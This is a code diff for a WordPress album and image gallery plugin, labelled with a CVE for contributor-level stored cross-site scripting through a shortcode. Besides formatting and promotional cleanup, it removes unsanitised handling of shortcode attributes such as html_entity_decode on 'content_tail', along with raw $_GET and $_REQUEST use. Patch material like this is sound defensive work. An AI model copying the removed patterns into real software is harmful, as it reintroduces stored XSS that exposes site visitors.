CVE-2025-13612: Album and Image Gallery Plus Lightbox <= 2.1.7 – Authenticated (Contributor+) Stored Cross-Site Scripting via Plugin's Shortcode (album-and-image-gallery-plus-lightbox)

--- a/album-and-image-gallery-plus-lightbox/album-and-image-gallery.php
+++ b/album-and-image-gallery-plus-lightbox/album-and-image-gallery.php
@@ -1,13 +1,15 @@
 <?php
 /**
  * Plugin Name: Album and Image Gallery Plus Lightbox
- * Plugin URI: https://www.essentialplugin.com/wordpress-plugins/album-image-gallery-plus-lightbox
+ * Plugin URI: https://essentialplugin.com/wordpress-plugins/album-image-gallery-plus-lightbox
  * Description: Easy to add and display image gallery and gallery slider. Also work with Gutenberg shortcode block.
  * Author: Essential Plugin
  * Text Domain: album-and-image-gallery-plus-lightbox
  * Domain Path: /languages/
- * Version: 2.1.7
- * Author URI: https://www.essentialplugin.com
+ * Version: 2.1.8
+ * Author URI: https://essentialplugin.com
+ * License: GPLv2 or later
+ * License URI: http://www.gnu.org/licenses/gpl-2.0.html
  *
  * @package Album and Image Gallery Plus Lightbox
  * @author Essential Plugin
@@ -23,43 +25,43 @@
  * @since 1.0.0
  */
 if ( ! defined( 'AIGPL_VERSION' ) ) {
-	define( 'AIGPL_VERSION', '2.1.7' ); // Version of plugin
+	define( 'AIGPL_VERSION', '2.1.8' ); // Version of plugin
 }

-if( ! defined( 'AIGPL_DIR' ) ) {
+if ( ! defined( 'AIGPL_DIR' ) ) {
 	define( 'AIGPL_DIR', dirname( __FILE__ ) ); // Plugin dir
 }

-if( ! defined( 'AIGPL_URL' ) ) {
+if ( ! defined( 'AIGPL_URL' ) ) {
 	define( 'AIGPL_URL', plugin_dir_url( __FILE__ ) ); // Plugin url
 }

-if( ! defined( 'AIGPL_POST_TYPE' ) ) {
+if ( ! defined( 'AIGPL_POST_TYPE' ) ) {
 	define( 'AIGPL_POST_TYPE', 'aigpl_gallery' ); // Plugin post type
 }

-if( ! defined( 'AIGPL_CAT' ) ) {
+if ( ! defined( 'AIGPL_CAT' ) ) {
 	define( 'AIGPL_CAT', 'aigpl_cat' ); // Plugin category name
 }

-if( ! defined( 'AIGPL_META_PREFIX' ) ) {
+if ( ! defined( 'AIGPL_META_PREFIX' ) ) {
 	define( 'AIGPL_META_PREFIX', '_aigpl_' ); // Plugin metabox prefix
 }

-if( ! defined( 'AIGPL_PLUGIN_LINK_UPGRADE' ) ) {
-	define('AIGPL_PLUGIN_LINK_UPGRADE','https://www.essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Upgrade-PRO'); // Plugin Check link
+if ( ! defined( 'AIGPL_PLUGIN_LINK_UPGRADE' ) ) {
+	define('AIGPL_PLUGIN_LINK_UPGRADE','https://essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Upgrade-PRO'); // Plugin Check link
 }

-if( ! defined( 'AIGPL_SITE_LINK' ) ) {
-	define('AIGPL_SITE_LINK', 'https://www.essentialplugin.com'); // Plugin Site link
+if ( ! defined( 'AIGPL_SITE_LINK' ) ) {
+	define('AIGPL_SITE_LINK', 'https://essentialplugin.com'); // Plugin Site link
 }

-if( ! defined( 'AIGPL_PLUGIN_BUNDLE_LINK' ) ) {
-	define('AIGPL_PLUGIN_BUNDLE_LINK', 'https://www.essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Welcome-Screen'); // Plugin link
+if ( ! defined( 'AIGPL_PLUGIN_BUNDLE_LINK' ) ) {
+	define('AIGPL_PLUGIN_BUNDLE_LINK', 'https://essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Welcome-Screen'); // Plugin link
 }

-if( ! defined( 'AIGPL_PLUGIN_LINK_UNLOCK' ) ) {
-	define('AIGPL_PLUGIN_LINK_UNLOCK', 'https://www.essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Features-PRO'); // Plugin link
+if ( ! defined( 'AIGPL_PLUGIN_LINK_UNLOCK' ) ) {
+	define('AIGPL_PLUGIN_LINK_UNLOCK', 'https://essentialplugin.com/pricing/?utm_source=WP&utm_medium=Album-Gallery&utm_campaign=Features-PRO'); // Plugin link
 }

 /**
@@ -131,7 +133,7 @@
 	aigpl_register_taxonomies();

 	// Deactivate Pro version
-	if( is_plugin_active('album-and-image-gallery-plus-lightbox-pro/album-and-image-gallery.php') ){
+	if ( is_plugin_active('album-and-image-gallery-plus-lightbox-pro/album-and-image-gallery.php') ){
 		add_action('update_option_active_plugins', 'aigpl_deactivate_pro_version');
 	}

@@ -158,13 +160,13 @@
 	global $pagenow;

 	// If not plugin screen
-	if( 'plugins.php' != $pagenow ) {
+	if ( 'plugins.php' != $pagenow ) {
 		return;
 	}

 	$dir = WP_PLUGIN_DIR . '/album-and-image-gallery-plus-lightbox-pro/album-and-image-gallery.php';

-	if( ! file_exists( $dir ) ) {
+	if ( ! file_exists( $dir ) ) {
 		return;
 	}

@@ -172,13 +174,16 @@
 	$notice_transient	= get_transient( 'aigpl_install_notice' );

 	// If free plugin exist
-	if( $notice_transient == false && current_user_can( 'install_plugins' ) ) {
+	if ( $notice_transient == false && current_user_can( 'install_plugins' ) ) {
 		echo '<div class="updated notice" style="position:relative;">
 			<p>
-				<strong>'.sprintf( __('Thank you for activating %s', 'album-and-image-gallery-plus-lightbox'), 'Album and Image Gallery Plus Lightbox').'</strong>.<br/>
-				'.sprintf( __('It looks like you had PRO version %s of this plugin activated. To avoid conflicts the extra version has been deactivated and we recommend you delete it.', 'album-and-image-gallery-plus-lightbox'), '<strong>Album and Image Gallery Plus Lightbox PRO</strong>' ).'
-			</p>
-			<a href="'.esc_url( $notice_link ).'" class="notice-dismiss" style="text-decoration:none;"></a>
+				<strong>' .
+				/* translators: %s is the plugin name that was activated */
+				sprintf( __('Thank you for activating %s', 'album-and-image-gallery-plus-lightbox'), 'Album and Image Gallery Plus Lightbox') . '</strong>.<br/>' .
+				/* translators: %s is the PRO plugin name that should be deactivated */
+				sprintf( __('It looks like you had PRO version %s of this plugin activated. To avoid conflicts the extra version has been deactivated and we recommend you delete it.', 'album-and-image-gallery-plus-lightbox'), '<strong>Album and Image Gallery Plus Lightbox PRO</strong>' ) .
+			'</p>
+			<a href="' . esc_url( $notice_link ) . '" class="notice-dismiss" style="text-decoration:none;"></a>
 		</div>';
 	}
 }
@@ -228,13 +233,13 @@

 	wpos_espbw_init_module( array(
 							'prefix'	=> 'aigpl',
-							'menu'		=> 'edit.php?post_type='.AIGPL_POST_TYPE,
+							'menu'		=> 'edit.php?post_type=' . AIGPL_POST_TYPE,
 						));
 }
 /* Recommended Plugins Ends */

 /* Plugin Wpos Analytics Data Starts */
-if( ! function_exists( 'aigpl_analytics_load' ) ) {
+if ( ! function_exists( 'aigpl_analytics_load' ) ) {
 	function aigpl_analytics_load() {

 		require_once dirname( __FILE__ ) . '/wpos-analytics/wpos-analytics.php';
--- a/album-and-image-gallery-plus-lightbox/includes/admin/class-aigpl-admin.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/class-aigpl-admin.php
@@ -159,7 +159,7 @@
 	 */
 	function aigpl_add_post_row_data( $actions, $post ) {

-		if( $post->post_type == AIGPL_POST_TYPE ) {
+		if ( $post->post_type == AIGPL_POST_TYPE ) {
 			return array_merge( array( 'aigpl_id' => 'ID: ' . esc_attr( $post->ID )), $actions );
 		}

@@ -175,7 +175,7 @@

 		global $typenow;

-		if( $typenow == AIGPL_POST_TYPE ) {
+		if ( $typenow == AIGPL_POST_TYPE ) {
 			include_once( AIGPL_DIR .'/includes/admin/settings/aigpl-img-popup.php');
 		}
 	}
@@ -194,11 +194,11 @@
 		$attachment_id		= ! empty( $_POST['attachment_id'] )	? aigpl_clean( $_POST['attachment_id'] )	: '';
 		$nonce				= ! empty( $_POST['nonce'] )			? aigpl_clean( $_POST['nonce'] )			: '';

-		if( ! empty( $attachment_id ) && wp_verify_nonce( $nonce, 'aigpl-edit-attachment-data' ) ) {
+		if ( ! empty( $attachment_id ) && wp_verify_nonce( $nonce, 'aigpl-edit-attachment-data' ) ) {

 			$attachment_post = get_post( $attachment_id );

-			if( ! empty( $attachment_post ) ) {
+			if ( ! empty( $attachment_post ) ) {

 				ob_start();

@@ -224,20 +224,27 @@
 	function aigpl_save_attachment_data() {

 		$prefix				= AIGPL_META_PREFIX;
-		$result				= array();
-		$result['success']	= 0;
-		$result['msg']		= esc_js( __( 'Sorry, Something happened wrong.', 'album-and-image-gallery-plus-lightbox' ) );
+		$result = array(
+			'success' => 0,
+			'msg'     => esc_js( __( 'Sorry, something went wrong.', 'album-and-image-gallery-plus-lightbox' ) ),
+		);
+
+		// Check if required POST values exist and sanitize
 		$attachment_id		= ! empty( $_POST['attachment_id'] )	? aigpl_clean( $_POST['attachment_id'] )	: '';
 		$nonce				= ! empty( $_POST['nonce'] )			? aigpl_clean( $_POST['nonce'] )			: '';
-		$form_data			= parse_str( $_POST['form_data'], $form_data_arr );
+		$form_data_arr = array(); // initialize to avoid undefined variable
+		if ( isset( $_POST['form_data'] ) ) {
+			$raw_form_data = wp_unslash( $_POST['form_data'] ); // store unslashed input in a variable
+			parse_str( $raw_form_data, $form_data_arr );          // parse into array
+		}

-		if( ! empty( $attachment_id ) && ! empty( $form_data_arr ) && wp_verify_nonce( $nonce, "aigpl-save-attachment-data-{$attachment_id}" ) ) {
+		if ( ! empty( $attachment_id ) && ! empty( $form_data_arr ) && wp_verify_nonce( $nonce, "aigpl-save-attachment-data-{$attachment_id}" ) ) {

 			// Getting attachment post
 			$aigpl_attachment_post = get_post( $attachment_id );

 			// If post type is attachment
-			if( isset( $aigpl_attachment_post->post_type ) && $aigpl_attachment_post->post_type == 'attachment' ) {
+			if ( isset( $aigpl_attachment_post->post_type ) && $aigpl_attachment_post->post_type == 'attachment' ) {
 				$post_args = array(
 									'ID'			=> $attachment_id,
 									'post_title'	=> ! empty( $form_data_arr['aigpl_attachment_title'] ) ? $form_data_arr['aigpl_attachment_title'] : $aigpl_attachment_post->post_name,
@@ -246,7 +253,7 @@
 								);
 				$update = wp_update_post( $post_args );

-				if( ! is_wp_error( $update ) ) {
+				if ( ! is_wp_error( $update ) ) {

 					update_post_meta( $attachment_id, '_wp_attachment_image_alt', aigpl_clean( $form_data_arr['aigpl_attachment_alt'] ) );
 					update_post_meta( $attachment_id, $prefix.'attachment_link', aigpl_clean_url( $form_data_arr['aigpl_attachment_link'] ) );
@@ -269,22 +276,32 @@

 		global $typenow;

-		$current_page = isset( $_REQUEST['page'] ) ? $_REQUEST['page'] : '';
+		// Unsplash and sanitize input
+		$current_page = isset( $_REQUEST['page'] ) ? sanitize_text_field( wp_unslash( $_REQUEST['page'] ) ) : '';

 		// If plugin notice is dismissed
-		if( isset( $_GET['message']) && $_GET['message'] == 'aigpl-plugin-notice' ) {
+		if ( isset( $_GET['message']) && $_GET['message'] == 'aigpl-plugin-notice' ) {
 			set_transient( 'aigpl_install_notice', true, 604800 );
 		}

 		// Redirect to external page for upgrade to menu
-		if( $typenow == AIGPL_POST_TYPE ) {
+		if ( $typenow == AIGPL_POST_TYPE ) {

-			if( $current_page == 'aigpl-premium' ) {
+			if ( $current_page == 'aigpl-premium' ) {

-				$tab_url		= add_query_arg( array( 'post_type' => AIGPL_POST_TYPE, 'page' => 'aigpl-solutions-features', 'tab' => 'aigpl_basic_tabs' ), admin_url('edit.php') );
+				$tab_url = add_query_arg(
+					array(
+						'post_type' => AIGPL_POST_TYPE,
+						'page'      => 'aigpl-solutions-features',
+						'tab'       => 'aigpl_basic_tabs'
+					),
+					admin_url('edit.php')
+				);

-				wp_redirect( $tab_url );
+				// Use wp_safe_redirect for safer redirection
+				wp_safe_redirect( $tab_url );
 				exit;
+
 			}
 		}

--- a/album-and-image-gallery-plus-lightbox/includes/admin/metabox/aigpl-post-setting-metabox-pro.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/metabox/aigpl-post-setting-metabox-pro.php
@@ -10,19 +10,13 @@
 	exit; // Exit if accessed directly
 } ?>

-<!-- <div class="pro-notice"><strong><?php //echo sprintf( __( 'Utilize this <a href="%s" target="_blank">Premium Features (With Risk-Free 30 days money back guarantee)</a> to get best of this plugin with Annual or Lifetime bundle deal.', 'album-and-image-gallery-plus-lightbox'), AIGPL_PLUGIN_LINK_UNLOCK); ?></strong></div> -->
-
-<!-- <div class="pro-notice">
-	<strong>
-		<?php // echo sprintf( __( 'Try All These <a href="%s" target="_blank">PRO Features in Essential Bundle Free For 5 Days.</a>', 'album-and-image-gallery-plus-lightbox'), AIGPL_PLUGIN_LINK_UNLOCK); ?>
-	</strong>
-</div> -->
-
-<!-- <div class="aigpl-black-friday-banner-wrp">
-	<a href="<?php // echo esc_url( AIGPL_PLUGIN_LINK_UNLOCK ); ?>" target="_blank"><img style="width: 100%;" src="<?php // echo esc_url( AIGPL_URL ); ?>assets/images/black-friday-banner.png" alt="black-friday-banner" /></a>
-</div> -->
-
-<strong style="color:#2ECC71; font-weight: 700;"><?php echo sprintf( __( ' <a href="%s" target="_blank" style="color:#2ECC71;">Upgrade To Pro</a> and Get Designs, Optimization, Security, Backup, Migration Solutions @ one stop.', 'album-and-image-gallery-plus-lightbox'), AIGPL_PLUGIN_LINK_UNLOCK); ?></strong>
+<strong style="color:#2ECC71; font-weight: 700;">
+	<?php
+	/* translators: %s is the plugin upgrade url */
+	echo sprintf( __( ' <a href="%s" target="_blank" style="color:#2ECC71;">Upgrade To Pro</a> and Get Designs, Optimization, Security, Backup, Migration Solutions @ one stop.', 'album-and-image-gallery-plus-lightbox'),
+	AIGPL_PLUGIN_LINK_UNLOCK);
+	?>
+</strong>

 <table class="form-table aigpl-metabox-table">
 	<tbody>
--- a/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/popup-ess-bundle-tab.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/popup-ess-bundle-tab.php
@@ -14,10 +14,6 @@

 <div id="aigpl_unlock_tabs" class="aigpl-vtab-cnt aigpl_unlock_tabs aigpl-clearfix">

-	<!-- <div class="aigpl-black-friday-banner-wrp">
-		<a href="<?php // echo esc_url( AIGPL_PLUGIN_BUNDLE_LINK ); ?>" target="_blank"><img style="width: 100%;" src="<?php // echo esc_url( AIGPL_URL ); ?>assets/images/black-friday-banner.png" alt="black-friday-banner" /></a>
-	</div> -->
-
 	<h2 style="font-size: 24px; text-align: center; color: #6c63ff;">Bundle Deal Details</h2>
 	<table class="wpos-plugin-list">
 		<thead>
@@ -100,33 +96,4 @@
 		<img style="width: 100%; margin-bottom:30px;" src="<?php echo esc_url( AIGPL_URL ); ?>assets/images/image-upgrade.png" alt="image-upgrade" title="image-upgrade" />
 	</div>

-	<!-- <div class="aigpl-deal-offer-wrap">
-		<div class="aigpl-deal-offer">
-			<div class="aigpl-inn-deal-offer">
-				<h3 class="aigpl-inn-deal-hedding"><span>Buy Album and Image Gallery Plus Lightbox</span> today and unlock all the powerful features.</h3>
-				<h4 class="aigpl-inn-deal-sub-hedding"><span style="color:red;">Extra Bonus: </span>Users will get <span>15% off</span> on the regular price using this coupon code.</h4>
-			</div>
-			<div class="aigpl-inn-deal-offer-btn">
-				<div class="aigpl-inn-deal-code"><span>EPS15</span></div>
-				<a href="<?php //echo esc_url(AIGPL_PLUGIN_BUNDLE_LINK); ?>" target="_blank" class="aigpl-sf-btn aigpl-sf-btn-orange"><span class="dashicons dashicons-cart"></span> Get Essential Bundle Now</a>
-				<em class="risk-free-guarantee"><span class="heading">Risk-Free Guarantee </span> - We offer a <span>30-day money back guarantee on all purchases</span>. If you are not happy with your purchases, we will refund your purchase. No questions asked!</em>
-			</div>
-		</div>
-	</div> -->
-
-	<!-- <div class="aigpl-deal-offer-wrap">
-		<div class="aigpl-deal-offer">
-			<div class="aigpl-inn-deal-offer">
-				<h3 class="aigpl-inn-deal-hedding"><span>Try Album and Image Gallery Plus Lightbox Pro</span> in Essential Bundle Free For 5 Days.</h3>
-			</div>
-			<div class="aigpl-deal-free-offer">
-				<a href="<?php //echo esc_url( AIGPL_PLUGIN_BUNDLE_LINK ); ?>" target="_blank" class="aigpl-sf-free-btn"><span class="dashicons dashicons-cart"></span> Try Pro For 5 Days Free</a>
-			</div>
-		</div>
-	</div> -->
-
-	<!-- <div class="aigpl-black-friday-banner-wrp">
-		<a href="<?php// echo esc_url( AIGPL_PLUGIN_BUNDLE_LINK ); ?>" target="_blank"><img style="width: 100%;" src="<?php // echo esc_url( AIGPL_URL ); ?>assets/images/black-friday-banner.png" alt="black-friday-banner" /></a>
-	</div> -->
-
 </div>
 No newline at end of file
--- a/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/solutions-features.php
+++ b/album-and-image-gallery-plus-lightbox/includes/admin/settings/solution-features/solutions-features.php
@@ -13,7 +13,11 @@
 // Taking some variables
 $aigpl_add_link = add_query_arg( array( 'post_type' => AIGPL_POST_TYPE ), admin_url( 'post-new.php' ) );

-$tab = isset( $_GET['tab'] ) ? '#'.$_GET['tab'] : '#aigpl_welcome_tabs';
+$tab = '#aigpl_welcome_tabs';
+
+if ( isset( $_GET['tab'] ) ) {
+	$tab = '#' . sanitize_text_field( $_GET['tab'] );
+}
 ?>

 <div id="wrap" class="wpos-solutions-features-page">
@@ -35,13 +39,6 @@
 		.aigpl-vtab-nav.aigpl-active-vtab a{ box-shadow: 5px 0 0 0 #46b450 inset !important; }
 		.aigpl-vtab-nav-wrap .aigpl-vtab-nav a:hover {box-shadow: 5px 0 0 0 #6c63ff inset !important; }

-		/**** commod deal offer ****/
-		/*.aigpl-deal-offer-wrap{position: relative;padding: 0.75rem 1.25rem;margin-bottom: 1rem;border: 1px solid transparent;border-radius: 0.25rem; color: #000;background-color: #ffd104;border-color: #ffd104;margin-top: 20px;}
-
-		.aigpl-deal-offer{display:flex;align-items: center; margin-top: 15px;}
-		.aigpl-inn-deal-offer{flex-basis:60%; padding: 20px; text-align:left;}
-		.aigpl-inn-deal-hedding span{color:#6c63ff;}*/
-
 		/***free 5 day offer new CSS START***/
 		.aigpl-deal-offer-wrap{position: relative;padding:0 1.25rem;margin-bottom: 1rem;border: 1px solid transparent;border-radius: 0.25rem; color: #000;background-color: #6c63ff;border-color: #6c63ff;margin-top: 20px;}
 		.aigpl-deal-offer{display:flex;align-items: center;}
@@ -53,7 +50,6 @@
 		.aigpl-sf-free-btn:hover, .aigpl-sf-free-btn:focus{ color: #000; }
 		/***free 5 day offer new CSS END***/

-
 		.aigpl-inn-deal-hedding{font-size: 22px;}

 		.aigpl-inn-deal-sub-hedding{font-size: 18px;}
@@ -136,7 +132,6 @@
 			</li>

 			<li class="aigpl-vtab-nav">
-				<!-- <a href="#aigpl_unlock_tabs" class="aigpl-overview-tabs"><?php //esc_html_e('Unlock More', 'album-and-image-gallery-plus-lightbox'); ?></a> -->
 				<a href="#aigpl_unlock_tabs" class="aigpl-overview-tabs"><?php esc_html_e('Album in Essential Bundle', 'album-and-image-gallery-plus-lightbox'); ?></a>
 			</li>

--- a/album-and-image-gallery-plus-lightbox/includes/aigpl-functions.php
+++ b/album-and-image-gallery-plus-lightbox/includes/aigpl-functions.php
@@ -92,7 +92,7 @@
 	// For Elementor & Beaver Builder
 	if( ( defined('ELEMENTOR_PLUGIN_BASE') && isset( $_POST['action'] ) && $_POST['action'] == 'elementor_ajax' )
 	|| ( class_exists('FLBuilderModel') && ! empty( $_POST['fl_builder_data']['action'] ) ) ) {
-		$unique = current_time('timestamp') . '-' . rand();
+		$unique = current_time('timestamp') . '-' . wp_rand();
 	}

 	return $unique;
@@ -110,7 +110,7 @@
 	// For Elementor & Beaver Builder
 	if( ( defined('ELEMENTOR_PLUGIN_BASE') && isset( $_POST['action'] ) && $_POST['action'] == 'elementor_ajax' )
 	|| ( class_exists('FLBuilderModel') && ! empty( $_POST['fl_builder_data']['action'] ) ) ) {
-		$unique = current_time('timestamp') . '-' . rand();
+		$unique = current_time('timestamp') . '-' . wp_rand();
 	}

 	return $unique;
--- a/album-and-image-gallery-plus-lightbox/includes/aigpl-post-types.php
+++ b/album-and-image-gallery-plus-lightbox/includes/aigpl-post-types.php
@@ -34,14 +34,14 @@
 								'remove_featured_image'		=> __( 'Remove Album Image', 'album-and-image-gallery-plus-lightbox' ),
 								'menu_name'					=> __( 'Album Gallery', 'album-and-image-gallery-plus-lightbox' ),
 								'use_featured_image'		=> __( 'Use as Album Image', 'album-and-image-gallery-plus-lightbox' ),
-								'items_list'				=> __( 'Album list.', 'sp-news-and-widget' ),
-								'item_published'			=> __( 'Album published.', 'sp-news-and-widget' ),
-								'item_published_privately'	=> __( 'Album published privately.', 'sp-news-and-widget' ),
-								'item_reverted_to_draft'	=> __( 'Album reverted to draft.', 'sp-news-and-widget' ),
-								'item_scheduled'			=> __( 'Album scheduled.', 'sp-news-and-widget' ),
-								'item_updated'				=> __( 'Album updated.', 'sp-news-and-widget' ),
-								'item_link'					=> __( 'Album Link', 'sp-news-and-widget' ),
-								'item_link_description'		=> __( 'A link to a album.', 'sp-news-and-widget' ),
+								'items_list'				=> __( 'Album list.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_published'			=> __( 'Album published.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_published_privately'	=> __( 'Album published privately.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_reverted_to_draft'	=> __( 'Album reverted to draft.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_scheduled'			=> __( 'Album scheduled.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_updated'				=> __( 'Album updated.', 'album-and-image-gallery-plus-lightbox' ),
+								'item_link'					=> __( 'Album Link', 'album-and-image-gallery-plus-lightbox' ),
+								'item_link_description'		=> __( 'A link to a album.', 'album-and-image-gallery-plus-lightbox' ),
 							));

 	$aigpl_slider_args = array(
@@ -112,21 +112,26 @@

 	$messages[AIGPL_POST_TYPE] = array(
 		0 => '', // Unused. Messages start at index 1.
-		1 => sprintf( __( 'Album Gallery updated.', 'album-and-image-gallery-plus-lightbox' ) ),
+		1 => __( 'Album Gallery updated.', 'album-and-image-gallery-plus-lightbox' ),
 		2 => __( 'Custom field updated.', 'album-and-image-gallery-plus-lightbox' ),
 		3 => __( 'Custom field deleted.', 'album-and-image-gallery-plus-lightbox' ),
 		4 => __( 'Album Gallery updated.', 'album-and-image-gallery-plus-lightbox' ),
+
+		/* translators: %s is the date/time of the revision being restored */
 		5 => isset( $_GET['revision'] ) ? sprintf( __( 'Album Gallery restored to revision from %s', 'album-and-image-gallery-plus-lightbox' ), wp_post_revision_title( (int) $_GET['revision'], false ) ) : false,
-		6 => sprintf( __( 'Album Gallery published.', 'album-and-image-gallery-plus-lightbox' ) ),
+
+		6 => __( 'Album Gallery published.', 'album-and-image-gallery-plus-lightbox' ),
 		7 => __( 'Album Gallery saved.', 'album-and-image-gallery-plus-lightbox' ),
-		8 => sprintf( __( 'Album Gallery submitted.', 'album-and-image-gallery-plus-lightbox' ) ),
+		8 => __( 'Album Gallery submitted.', 'album-and-image-gallery-plus-lightbox' ),
+
+		/* translators: %1$s is the scheduled date and time of the post */
 		9 => sprintf( __( 'Album Gallery scheduled for: <strong>%1$s</strong>.', 'album-and-image-gallery-plus-lightbox' ),
 		  date_i18n( __( 'M j, Y @ G:i', 'album-and-image-gallery-plus-lightbox' ), strtotime( $post->post_date ) ) ),
-		10 => sprintf( __( 'Album Gallery draft updated.', 'album-and-image-gallery-plus-lightbox' ) ),
+
+		10 => __( 'Album Gallery draft updated.', 'album-and-image-gallery-plus-lightbox' ),
 	);

 	return $messages;
 }
-
 // Filter to update slider post message
 add_filter( 'post_updated_messages', 'aigpl_post_updated_messages' );
 No newline at end of file
--- a/album-and-image-gallery-plus-lightbox/includes/class-aigpl-script.php
+++ b/album-and-image-gallery-plus-lightbox/includes/class-aigpl-script.php
@@ -120,11 +120,14 @@

 		// Registring public script
 		wp_register_script( 'aigpl-public-js', AIGPL_URL.'assets/js/aigpl-public.js', array('jquery'), AIGPL_VERSION, true );
+
+		/* translators: %curr% is the current image number, %total% is the total number of images */
+		$mfp_img_counter = esc_js( __( '%curr% of %total%', 'album-and-image-gallery-plus-lightbox' ) );
 		wp_localize_script( 'aigpl-public-js', 'Aigpl', array(
 															'elementor_preview'	=> $elementor_preview,
 															'is_mobile'			=> (wp_is_mobile())	? 1 : 0,
 															'is_rtl'			=> (is_rtl())		? 1 : 0,
-															'mfp_img_counter'	=> esc_js( __( '%curr% of %total%', 'album-and-image-gallery-plus-lightbox' ) ),
+															'mfp_img_counter'	=> $mfp_img_counter,
 															'is_avada'			=> (class_exists( 'FusionBuilder' ))	? 1 : 0,
 														));

--- a/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album-slider.php
+++ b/album-and-image-gallery-plus-lightbox/includes/shortcode/aigpl-gallery-album-slider.php
@@ -21,12 +21,12 @@
 	global $post;

 	// SiteOrigin Page Builder Gutenberg Block Tweak - Do not Display Preview
-	if( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
+	if ( isset( $_POST['action'] ) && ($_POST['action'] == 'so_panels_layout_block_preview' || $_POST['action'] == 'so_panels_builder_content_json') ) {
 		return "[aigpl-gallery-album-slider]";
 	}

 	// Divi Frontend Builder - Do not Display Preview
-	if( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
+	if ( function_exists( 'et_core_is_fb_enabled' ) && isset( $_POST['is_fb_preview'] ) && isset( $_POST['shortcode'] ) ) {
 		return '<div class="aigpl-builder-shrt-prev">
 					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Album Slider View', 'album-and-image-gallery-plus-lightbox').'</span></div>
 					aigpl-gallery-album-slider
@@ -34,7 +34,7 @@
 	}

 	// Fusion Builder Live Editor - Do not Display Preview
-	if( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
+	if ( class_exists( 'FusionBuilder' ) && (( isset( $_GET['builder'] ) && $_GET['builder'] == 'true' ) || ( isset( $_POST['action'] ) && $_POST['action'] == 'get_shortcode_render' )) ) {
 		return '<div class="aigpl-builder-shrt-prev">
 					<div class="aigpl-builder-shrt-title"><span>'.esc_html__('Gallery Grid View', 'album-and-image-gallery-plus-lightbox').'</span></div>
 					aigpl-gallery-album-slider
@@ -43,47 +43,47 @@

 	// Shortcode Parameter
 	extract(shortcode_atts(array(
-				'limit'						=> 15,
-				'album_design'				=> 'design-1',
-				'album_link_target'			=> 'self',
-				'album_height'				=> '',
-				'album_title'				=> 'false',
-				'album_description'			=> 'false',
-				'album_full_content'		=> 'false',
-				'words_limit'				=> 40,
-				'content_tail'				=> '...',
-				'id'						=> array(),
-				'category'					=> '',
-				'total_photo'				=> '{total}'.' '.__('Photos','album-and-image-gallery-plus-lightbox'),
-				'popup'						=> 'true',
-				'grid'						=> 3,
-				'gallery_height'			=> '',
-				'design'					=> 'design-1',
-				'show_caption'				=> 'true',
-				'show_title'				=> 'false',
-				'show_description'			=> 'false',
-				'link_target'				=> 'self',
-				'image_size'				=> 'full',
-
-				'album_slidestoshow'		=> 3,
-				'album_slidestoscroll'		=> 1,
-				'album_dots'				=> 'true',
-				'album_arrows'				=> 'true',
-				'album_autoplay'			=> 'true',
-				'album_autoplay_interval'	=> 3000,
-				'album_speed'				=> 300,
-				'loop'						=> 'true',
-				'lazyload'					=> '',
-				'extra_class'				=> '',
-				'className'					=> '',
-				'align'						=> '',
+		'limit'						=> 15,
+		'album_design'				=> 'design-1',
+		'album_link_target'			=> 'self',
+		'album_height'				=> '',
+		'album_title'				=> 'false',
+		'album_description'			=> 'false',
+		'album_full_content'		=> 'false',
+		'words_limit'				=> 40,
+		'content_tail'				=> '...',
+		'id'						=> array(),
+		'category'					=> '',
+		'total_photo'				=> '{total}'.' '.__('Photos','album-and-image-gallery-plus-lightbox'),
+		'popup'						=> 'true',
+		'grid'						=> 3,
+		'gallery_height'			=> '',
+		'design'					=> 'design-1',
+		'show_caption'				=> 'true',
+		'show_title'				=> 'false',
+		'show_description'			=> 'false',
+		'link_target'				=> 'self',
+		'image_size'				=> 'full',
+
+		'album_slidestoshow'		=> 3,
+		'album_slidestoscroll'		=> 1,
+		'album_dots'				=> 'true',
+		'album_arrows'				=> 'true',
+		'album_autoplay'			=> 'true',
+		'album_autoplay_interval'	=> 3000,
+		'album_speed'				=> 300,
+		'loop'						=> 'true',
+		'lazyload'					=> '',
+		'extra_class'				=> '',
+		'className'					=> '',
+		'align'						=> '',
 	), $atts, 'aigpl-gallery-album-slider' ));

 	$album_designs		= aigpl_album_designs();
 	$unique_album_no	= aigpl_unique_num();
-	$content_tail		= html_entity_decode( $content_tail );
-	$limit				= ! empty( $limit )						? $limit 							: 15;
-	$post_ids			= ! empty( $id )						? explode(',', $id) 				: array();
+	$content_tail		= sanitize_text_field( $content_tail );
+	$limit				= ! empty( $limit )						? absint($limit) 							: 15;
+	$post_ids			= ! empty( $id )						? array_map( 'absint', explode( ',', $id ) )	: array();
 	$album_design		= ( $album_design && ( array_key_exists( trim( $album_design ), $album_designs ))) ? trim( $album_design ) : 'design-1';
 	$album_link_target	= ( $album_link_target == 'blank' )		? '_blank' 							: '_self';
 	$album_title		= ( $album_title == 'true' )			? 1									: 0;
@@ -106,7 +106,7 @@
 	$align				= ! empty( $align )						? 'align'.$align					: '';
 	$extra_class		= $extra_class .' '. $align .' '. $className;
 	$extra_class		= aigpl_sanitize_html_classes( $extra_class );
